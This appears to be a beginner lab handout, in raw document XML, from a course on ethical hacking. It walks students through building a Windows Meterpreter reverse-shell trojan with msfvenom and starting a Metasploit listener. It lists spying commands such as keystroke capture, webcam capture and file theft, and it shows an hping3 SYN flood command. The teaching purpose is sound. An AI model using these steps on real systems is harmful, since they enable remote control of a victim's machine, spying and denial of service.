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B813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3 Lab: Introduction to Malware Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5724856C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CCS6324 - Ethical Hacking and Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1F55E1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Hour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Beginner-Friendly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 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 &amp; macOS (using Kali Linux VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602E63D1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5B16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B822E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SAFETY FIRST - READ ALOUD TO STUDENTS </w:t>
      </w:r>
      <w:r w:rsidRPr="005020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</w:p>
    <w:p w14:paraId="29204A9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"Everything we do today stays INSIDE your virtual machine. NEVER run these tools on real computers or real networks. This is like a science experiment in a sealed container - nothing gets out!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DB608B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8158B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13A9D6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1: UNDERSTANDING THE BASICS (10 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42673B74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Malware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D609A46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Malware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Mal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icious + Soft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ware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B2DB2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like a "bad app" that does harmful things:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE4DD55" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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Steals your passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700BCD48" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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Locks your files (ransomware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCF4755" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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Spies on you</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF04B3E" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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Lets hackers control your computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26834851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Trojan?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A0726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Trojan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malware disguised as something useful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570E75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example: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Imagine someone gives you a free USB drive that looks normal, but secretly it has a hidden program that sends your files to a hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5768BB37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We'll Do Today</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3246A" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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simple trojan (in our safe lab only!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF8E4E1" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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Watch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it does using special monitoring tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A715491" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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antivirus can catch it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C62DCB" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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to protect against these attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D7ACE5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5353FF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10B976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2: OPEN YOUR KALI LINUX VM (2 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A7CFD8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 Windows Users (VirtualBox/VMware):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD3B34" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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VirtualBox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VMware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24351A66" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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on your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VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24429319" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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(green arrow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2911E9F8" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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Kali to boot up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F49984D" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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Login: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35648735" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="005020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Username: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA3CFCC" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="005020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Password: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6367B341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 macOS Users (VirtualBox/VMware/UTM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C549F0E" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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your virtualization software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756698C6" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFFE913" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239D7591" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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Login: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB3F24C" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="005020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Username: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14633769" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="005020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Password: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D517CE7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E3DE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A3187E0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3: OPEN THE TERMINAL (1 minute)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5936940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where we type commands. Think of it like texting commands to your computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD9FA42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to Open Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E62796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 the terminal icon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top menu bar (black rectangle icon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D89D4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3B1617A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Right-click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desktop →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Terminal Here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5996A60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 something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D4400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┌──(kali</w:t>
      </w:r>
      <w:r w:rsidRPr="005020BA">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>㉿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kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D67078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└─$ _</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA5757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you'll type commands!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6898808A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EE01ED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882951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4: CREATE YOUR FIRST TROJAN (15 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA5D395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Find Your IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2B5B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an IP address?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It's like your computer's phone number on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F255B2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 command and press Enter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE5F2F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38267FE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look for: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Find the line with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inet 192.168.x.x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10.0.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3805245F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output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3851227C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eth0: inet 192.168.100.10/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA4BDF3" w14:textId="0601848F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down your IP address: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="000B32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10.10.0.6/24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</w:p>
    <w:p w14:paraId="1A17D105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(For most students, it will be something like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192.168.100.10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10.0.2.15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EBA7A12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70C67A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E9C26D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Create a Folder for Your Work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD4D127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this?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We're creating a folder to keep our files organized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B687AE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 command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F5FBC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malware_lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64488025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means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C68E4E8" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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mkdir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"make directory" (create folder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F226D79" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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malware_lab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name of the folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CEA8F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Now go into that folder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113464FF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malware_lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221341A3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means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C9CA21" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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"change directory" (go into folder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735C2B80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1F1AFC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1FDD3B3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Create the Trojan Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AF39C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msfvenom?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It's a tool that creates test malware. Security professionals use it to test if systems are protected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A48EA53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this command (replace YOUR_IP with your actual IP address):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A525A62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msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe -o trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1462081E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IMPORTANT: Replace YOUR_IP!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE2850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your IP is 192.168.100.10, the command is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD4E7E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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.10 LPORT=4444 -f exe -o trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717911E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your IP is 10.0.2.15, the command is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB10530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msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe -o trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20F1DB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1627"/>
        <w:gridCol w:w="2428"/>
      </w:tblGrid>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="5B1AF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B3C39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B720C22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483B62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Simple Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="50C2B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4BCA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msfvenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C3D67A9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tool name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ABEB216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Our payload maker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="0E33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1443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-p windows/meterpreter/reverse_tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E212ABA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Payload type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4970F9FC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Makes Windows trojan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="7E5CD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9B64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LHOST=YOUR_IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EAD38CC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IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0668D26A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Where trojan calls home</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="100F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A290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LPORT=4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31205EA2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41DB2B0B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Which "door" to use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="7F2D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1931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-f exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D934A3D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693CD0B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Makes .exe file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="4FB2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C68A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-o trojan.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BA5584C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filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41395658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Saves as trojan.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02C7C0E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</w:p>
    <w:p w14:paraId="44407BA4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[-] No platform was selected, choosing Msf::Module::Platform::Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D429FA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[-] No arch selected, selecting arch: x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5B6622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encoder specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136A328C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 size: 354 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C21D2A3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size of exe file: 73802 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689AB6BE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Saved as: trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126176DC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Success!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created your first trojan!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019959C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FF09ED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08D6AA6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Verify the File Was Created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C412823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2AADABA5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-lh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639EA61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means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5857AA2F" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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list files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3628AC62" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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-lh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show details in human-readable format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A073D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should see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA48E9E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-rw-r--r-- 1 kali kali 73K Nov 17 10:30 trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23002CF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shows your trojan file is about 73KB in size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA23BF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D0B41A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CA47AD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5: Get the File's "Fingerprint" (Hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342CAA4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hash?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It's like a unique fingerprint for a file. Every file has a different hash. Security tools use hashes to identify malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308CB431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20E98C33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md5sum trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB4568C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output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3369006B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5d41402abc4b2a76b9719d911017c592  trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E41CE41" w14:textId="4EB048C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down your hash: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="00251E62" w:rsidRPr="00251E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9054563388a3cd1ead829da868e78222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</w:p>
    <w:p w14:paraId="1D927519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E2748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A2FFA0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PART 5: SET UP THE LISTENER (10 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063551CE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Listener?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468FF38C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trojan runs on a victim's computer, it "calls home" to the attacker. The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listener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"phone" that answers that call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7F260B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Start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E321D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Metasploit?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It's a professional security testing tool used by ethical hackers worldwide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F96885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</w:p>
    <w:p w14:paraId="2CF8DA28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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D5E9A0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Wait 30-60 seconds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it to load. You'll see cool ASCII art and then:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667088B2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msf6 &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0639123F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 Metasploit is ready!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567DBED8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9CC57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10F5B02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Set Up the Handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35231CD7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handler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what catches the connection from our trojan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F163807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these commands one by one (press Enter after each):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327028CE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exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA2C86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(This selects the handler module)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EAC14F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payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5006C91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(This tells it what kind of connection to expect)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5E6070" w14:textId="3D34CC96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set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="008904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10.10.0.6/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A668AD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(Replace YOUR_IP with your IP address, like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LHOST 192.168.100.10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50A9355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LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C2FF98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(Sets the port to 4444 - same as in our trojan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D42A49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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6666F19B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(Starts listening)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164FC54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should see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4F8D9C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[*] Started reverse TCP handler on 192.168.100.10:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF84D3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listener is now waiting for connections!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B75C59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514E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5E979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6: UNDERSTANDING WHAT WOULD HAPPEN (10 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EABD8B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 Real Life...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F766C18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someone ran our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trojan.exe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their Windows computer, we would see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1D8C17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[*] Meterpreter session 1 opened (192.168.100.10:4444 -&gt; 192.168.100.20:49234)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194311D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2CE873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meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDE3F20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means we would have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control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their computer!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F286836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Could an Attacker Do?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C329693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we were in a Meterpreter session, these commands would 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455"/>
      </w:tblGrid>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="2C3DB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77B60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D4FEBF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5020BA" w:rsidRPr="005020BA" w14:paraId="48416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AAA8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sysinfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="184FCB92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computer name, OS version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="75474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CB08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getuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F32A742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which user is logged in</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="2C32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1816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14:paraId="3D98DBBC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current folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="4EEA8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652D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6DAE3315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Lists files in folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="53FE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6DE5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screenshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69649D97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Takes picture of their screen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="3327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2D3E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webcam_snap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74F697BC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Takes photo from webcam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="55D6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3D8F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keyscan_start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69895D88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Starts recording keystrokes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="5CB27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EF94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download file.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64DBBB6F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Steals a file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45108D0F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Matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27004447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 we:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50482ABD" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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click unknown email attachments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9C716B" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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Don't download software from untrusted sites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB81121" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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antivirus updated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F75F130" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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plug in unknown USB drives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB27BE2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84E10B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473E7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7: HOW ANTIVIRUS DETECTS MALWARE (5 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434C30F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Would Antivirus Catch Our Trojan?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072BF04B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 1: Signature Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE188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Antivirus has a list of known malware "fingerprints" (hashes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F0D8F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Our hash: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5d41402abc4b2a76b9719d911017c592</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0BD0B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this hash is in their database →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BLOCKED!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4721411D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 2: Behavior Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CBC183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Antivirus watches what programs do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB9F78" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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it try to connect to unknown servers? </w:t>
      </w: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🚨</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB1B979" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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it try to record keystrokes? </w:t>
      </w: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🚨</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032552F8" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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it try to access sensitive files? </w:t>
      </w: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🚨</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EC98E2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 3: Heuristic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B1F710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Antivirus looks at the code and asks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5FECF1" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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look like known malware patterns?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D11A202" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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try to hide itself?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4880F301" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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have suspicious characteristics?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F743C2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E36FC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EF2D83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8: QUICK DoS ATTACK DEMO (5 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B1D1B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DoS Attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC7D64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DoS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enial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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C74A954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It's like 1000 people trying to go through one door at the same time - nobody can get through!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6290CA43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Hackers Do It</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AC68D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send millions of fake requests to a website until it crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C400881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Simple Demo (Concept Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F93205F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command would be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4D9861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hping3 -S --flood -p 80 TARGET_IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDBA019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means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D99B746" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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hping3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network testing tool</w:t>
      </w:r>
    </w:p>
